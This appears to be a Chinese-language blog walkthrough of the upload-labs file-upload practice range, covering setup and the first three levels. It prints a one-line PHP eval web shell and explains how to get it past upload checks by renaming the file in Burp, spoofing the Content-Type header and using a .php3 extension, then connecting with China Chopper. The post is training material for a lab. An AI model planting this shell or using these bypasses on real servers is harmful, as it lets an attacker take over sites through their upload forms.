最近发现了一个文件上传的靶场:
https://github.com/c0ny1/upload-labs github上面的项目。
大家可以把这个仓库克隆到phpstudy下的www目录下进行练手
php版本:推荐5.2.17(其他版本可能会导致部分Pass无法突破)
php组件:php_gd2,php_exif(部分Pass需要开启这两个组件)
apache:以moudel方式连接
此上传漏洞靶场包括的题目类型:
就本靶场做一些个人记录:
pass1:
本次测试使用的一句话木马为:
<?php
@eval($_POST["cmd"]);
?>
看到这一关是前端文件后缀检验,那就绕过前端检验
首先将一句话木马的后缀名保存为3.jpg
然后通过burp抓包:
修改后缀名后进行重放操作:
看到文件被成功上传。通过打开控制台可以看到i文件的的路径。
然后一句话木马,连上看看:
确实连上了,成功上传并getshell。
pass2:
看源码发现他会检验Content-Type: 这个字段,将它改为:
image/jpeg
发现文件上传成功,getshell。
pass3:
查看源码,发现它是黑名单过滤,如果后缀名为
'asp','.aspx','.php','.jsp'
阻止上传。那我们的思路就是看看它这个黑名单有没有漏洞,比如这个黑名单就没有排除掉.php3此后缀名,或者这个单纯的黑名单并没有考虑到大小写绕过的问题,所以我们就可以利用大小写绕过和php3来绕过防护。
笔者这里用.php3这种方法来绕过。
连接菜刀过程略。
直接取改一句话木马的后缀名为.php3进行上传。
发现文件直接上传成功,笔者验证,菜刀也是可以连接到的。
这次就分享着么多,如有不当还请各位大佬指出。
个人博客地址:https://dlddw.xyz/